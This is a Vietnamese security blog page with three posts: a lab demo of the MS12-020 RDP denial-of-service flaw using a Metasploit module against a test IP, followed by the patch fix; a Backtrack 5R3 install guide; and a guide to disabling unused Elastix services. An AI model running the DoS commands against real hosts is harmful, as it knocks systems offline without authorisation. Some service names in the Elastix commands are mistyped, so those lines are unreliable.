Security

now browsing by category

Các bài lab Security

 
Posted by: | Posted on: May 9, 2016

Demo khai thác và fix lổ hổng MS12-020

Demo khai thác và fix lổ hổng MS12-020

Lỗ hổng bảo mật này cho phép hacker từ xa có thể làm tê liệt hoàn toàn máy tính bằng cách cài đặt các mã độc khi máy tính có mở dịch vụ Remote Desktop Protocol (RDP)

1. Demo: Sử dụng BackTrack 5R3

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Demo khai thac va fix lo hong MS12-020 show options

msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.0.2.52

Demo khai thac va fix lo hong MS12-020 set RHOST

msf auxiliary(ms12_020_maxchannelids) > exploit

Demo khai thac va fix lo hong MS12-020 exploit

2. Kết quả trên Victim: Khởi động lại sau vài giây

Demo khai thac va fix lo hong MS12-020 Victim

3. Khắc phục

– Update bản vá cho Windows Server 2008 Enterprise SP1 (như trong video dưới)
Hoặc download bản vá cho các phiên bản windows khác tại: https://technet.microsoft.com/library/security/ms12-020

Xem thêm video demo khai thác và fix lổ hổng MS12-020:

Content Protection by DMCA.com
Posted by: | Posted on: June 11, 2015

Hướng dẫn cài đặt Backtrack 5R3

Hướng dẫn cài đặt Backtrack 5R3

1. Backtrack là gì

Backtrack là một bản phân phối của Linux, được phát triển để thử nghiệm thâm nhập. Trong các định dạng Live DVD, có thể sử dụng Backtrack trực tiếp từ DVD hoặc cài đặt trên máy và sử dụng như một hệ điều hành.

Công cụ kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như sau:

  • Information gathering: Thu thập thông tin (Trang web, máy chủ mail…)
  • Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về hệ điều hành, ứng dụng được sử dụng bởi mục tiêu…
  • Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).
  • Web application analysis: Theo dõi, giám sát các ứng dụng web.
  • Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID).
  • Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.
  • Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền.
  • Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để duy trì quyền truy cập.
  • Voice Over IP (VOIP): Các công cụ để phân tích VOIP.
  • Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start Backtrack Forensics trong trình đơn khởi động.
  • Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.

2. Download và cài đặt Backtrack

Có thể download phiên bản cuối cùng của Backtrack

2.1. Đóng bộ cài vào USB sử dụng iso2usb

Donwload Iso2usb phiên bản mới nhất tại đây

Sau khi tải về, chạy chương trình và chọn như hình
Huong dan cai dat backtrack

Trong đó
Diskimage: Chỉ đến file ISO vừa down ở trên về
USB Drive: Chọn USB sử dụng để đóng bộ cài
** Xem hướng dẫn chi tiết tại


2.2. Cài đặt Backtrack5R3 vào máy tính

Backtrack có thể chạy trực tiếp từ USB (Live) mà không cần cài đặt vào máy tính, nhưng như vậy sẽ mất các thiết lập tùy chọn sau mỗi lần khởi động lại.

Dưới đây là hướng dẫn cài đặt vào ổ cứng của máy tính (Máy ảo VMWare).

Chọn máy khởi động từ file ISO, chạy ở chế độ Live

Gõ lệnh Startx để khởi động vào Desktop Enviroment

Nhấn vào Install BackTrack trên màn hình Desktop và thực hiện theo hướng dẫn. Lưu ý bước

  • Prepare disk space: Bước này là chọn ổ cứng. Nếu bạn chọn Erase and use entire sẽ bị xóa hết dữ liệu sẵn có từ ổ cứng, vì vậy chỉ chọn khi ổ cứng (Lưu ý đang cài trên máy ảo VMWare) -> Forward
  • Đăng nhập tài khoản: root-toor

** Xem hướng dẫn chi tiết cài đặt tại

Content Protection by DMCA.com
Posted by: | Posted on: July 3, 2015

Tắt các dịch vụ không cần thiết trong hệ thống Elastix

Tat cac dich vu khong can thiet trong he thong Elastix

Tắt các dịch vụ không cần thiết trong hệ thống Elastix



Khi cài đặt Elastix có một số dịch vụ được cài mặc định mà bạn chẳng bao giờ cần dùng đến. Vì vậy có thể kiểm tra và tắt nó đi.

Để kiểm tra dịch vụ đang chạy, bạn dùng lệnh sau

#chkconfig –list

Tat cac dich vu khong can thiet trong he thong Elastix

Linux hỗ trợ 6 runlevel, mỗi runlevel sẽ tự động start một số chức năng, dịch vụ nhất định. (Như printing (cups), scheduling (crond), Apache (httpd), Samba( smbd).

Ví dụ trong single-user mode, chỉ có duy nhất một user được phép kết nối với hệ thống. X11 mode chạy Linux với giao diện đồ họa

  • 0: halt
  • 1: single-user mode, sử dụng trong backups/restores và repair
  • 2: Mutiuser, khong hỗ trợ networking
  • 3: Multiuser, có hỗ trợ networking
  • 4: không dùng
  • 5: X11, sử dụng GUI desktop
  • 6: reboot

Bây giờ thực hiện vô hiệu hóa các dịch vụ không cần sử dụng đến.

IP6TABLES: là phiên bản của iptables cho IPv6, có thể tắt nếu bạn vẫn đang dùng IPv4

#chkconfig –level 345 ip6tables off

KUDZU: là một dịch vụ phát hiện các thay đổi phần cứng mỗi lần hệ thống khởi động ngay cả khi bạn không hề có một thay đổi phần cứng nào, dịch vụ này vẫn chạy. Đối với server khi việc thay đổi các thiết bị phần cứng là rất ít (hoặc không có) thì nên tắt dịch vụ này và chỉ bật những lúc cần thiết.

#chkconfig –level 345 kudzu off

ISDN: là một dịch vụ kết nối Internet thông qua modem ISDN

#chkconfig –level 2345 isdn off

NETFS: là dịch vụ tự động mount bất kì một mạng chia sẻ file nào như NFS, Samba khi khởi động. Đây là một dịch vụ rất hữu dụng nếu bạn kết nối tới một server nào đó hoặc đang chia sẻ file trong mạng cục bộ của mình.

#chkconfig –level 345 netfs off

NFSLOCK: là mạng chia sẻ file chuẩn của hệ thống Unix/Linux/ BSD

#chkconfig –level 345 nfslock off

PORTMAP: là dịch vụ quản lý các kết nối RPC (Remote Procedure Call). Nhiệm vụ chính là chuyển số của các chương trình RPC sang số hiệu cổng của giao thức TCP/IP (hoặc UDP/IP). Những ứng dụng phổ biến nhất sử dụng portmap là NFS và NIS.

#chkconfig –level 345 portmap off

RESTORECOND: là một dịch vụ của SELinux, theo dõi và phục hồi các thông tin ngữ cảnh cho SELinux

#chkconfig –level 345 restodecond off

RPCGSSD / RPCIDMAPD: là những dịch vụ cần thiết cho NFS v4. Nếu bạn không có nhu cầu sử dụng NFS v4

#chkconfig –level 345 rpcgssd off
#chkconfig –level 345 rpcidmapd off

Các lệnh trên là không cho dịch vụ khởi động cùng hệ điều hành (Linux), nhưng hiện tại vẫn đang được chạy trên hệ thống. Muốn tắt ngay thì thực hiện thêm các lệnh dưới đây.

#service ip6tables stop
#service kudzu stop
#service isdn stop
#service netfs stop
#service nfslock stop
#service portmap stop
#service restodecond stop
#service pcgssd stop
#service rpcidmapd stop

Như vậy chúng ta đã tắt bớt các dịch vụ không cần thiết mà vẫn đảm bảo được hệ thống PBX hoạt động đúng, đủ chức năng.

Content Protection by DMCA.com